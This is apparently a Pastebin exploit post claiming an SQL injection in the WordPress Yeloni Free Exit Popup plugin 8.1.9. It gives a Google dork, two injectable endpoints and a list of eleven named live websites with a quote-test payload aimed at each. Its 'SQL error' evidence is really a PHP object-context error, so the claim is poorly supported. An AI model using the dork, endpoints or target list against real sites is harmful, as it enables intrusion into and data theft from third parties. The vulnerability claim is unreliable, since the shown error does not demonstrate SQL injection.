KingSkrupellos

WordPress Yeloni Free Exit Popup Plugins 8.1.9 SQL Injection

Jan 27th, 2019
87
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.76 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : WordPress Yeloni Free Exit Popup Plugins 8.1.9 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 28/01/2019
  7. # Vendor Homepage : yeloni.com
  8. # Software Download Link : downloads.wordpress.org/plugin/yeloni-free-exit-popup.zip
  9. # Software Information Link : wordpress.org/plugins/yeloni-free-exit-popup/
  10. # Software Version : 8.1.9
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/wp-content/plugins/yeloni-free-exit-popup/wordpress/''
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17.  
  18. ####################################################################
  19.  
  20. # Description :
  21. *************
  22.  
  23. * Yeloni is a powerful lead generation plugin that converts abandoning visitors on your website
  24.  
  25. into subscribers using attention grabbing forms that are proven to convert.
  26.  
  27. Choose from a wide variety of configurations, targetting options and
  28.  
  29. widget designs to customize your popup.
  30.  
  31. ####################################################################
  32.  
  33. # Impact :
  34. **********
  35.  
  36. * WordPress Yeloni Free Exit Popup Plugins 8.1.9 and other versions is prone to an
  37.  
  38. SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
  39.  
  40. data before using it in an SQL query.
  41.  
  42. * Exploiting this issue could allow an attacker to compromise the application, read,
  43.  
  44. access or modify data, or exploit latent vulnerabilities in the underlying database.
  45.  
  46. If the webserver is misconfigured, read & write access to the filesystem may be possible.
  47.  
  48. ####################################################################
  49.  
  50. # SQL Injection Exploit :
  51. ***********************
  52.  
  53. /wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=[SQL Injection]
  54.  
  55. /wp-content/plugins/yeloni-free-exit-popup/wordpress/client-load.php?id=[SQL Injection]
  56.  
  57. ####################################################################
  58.  
  59. # Example Vulnerable Sites :
  60. ***************************
  61.  
  62. [+] startadora.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
  63.  
  64. [+] podfo.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
  65.  
  66. [+] hviaonline.com/funds/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
  67.  
  68. [+] interset.digital/site/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
  69.  
  70. [+] speakerhead.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
  71.  
  72. [+] sterlingequipmentinc.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
  73.  
  74. [+] ewan.lublin.pl/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
  75.  
  76. [+] thequadgroup.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
  77.  
  78. [+] zenic.co.uk/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
  79.  
  80. [+] englishxp.co.uk/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
  81.  
  82. [+] rodoyo.com/wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php?id=1%27
  83.  
  84. ####################################################################
  85.  
  86. # Example SQL Database Error :
  87. ******************************
  88.  
  89. Fatal error: Using $this when not in object context in /home/axtvr/public_html
  90. /wp-content/plugins/yeloni-free-exit-popup/wordpress/yetience_config.php on line 2
  91.  
  92. ####################################################################
  93.  
  94. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  95.  
  96. ####################################################################
Add Comment
Please, Sign In to add comment